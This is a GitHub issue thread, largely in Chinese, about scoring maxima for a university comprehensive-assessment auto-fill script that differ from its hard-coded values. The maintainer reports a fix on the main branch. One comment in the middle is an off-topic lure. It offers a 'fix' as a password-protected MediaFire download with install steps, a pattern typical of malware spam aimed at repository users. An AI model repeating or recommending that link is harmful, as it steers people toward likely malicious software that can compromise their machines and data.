### ISSUE TITLE
评分标准似乎每年有变化，建议添加在README.md

### ISSUE THREAD

**Issue by a1henu** [CoroCona/auto-comprehensive-assessment#4]
![grade_standard](https://github.com/user-attachments/assets/5f92f7ff-2420-4bb9-a408-ed2d9b6de542)
各项的满分与[auto_fill.py](https://github.com/phuturesh/auto-comprehensive-assessment/blob/main/auto_fill.py#L32)不一致，可能溢出导致评分有误，建议在`README`添加提醒

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by a1henu** [comment]
尝试了一下，手打时候如果打分超过满分，会自动变成满分（）

**Comment by phuturesh** [comment]
最新main分支已提交
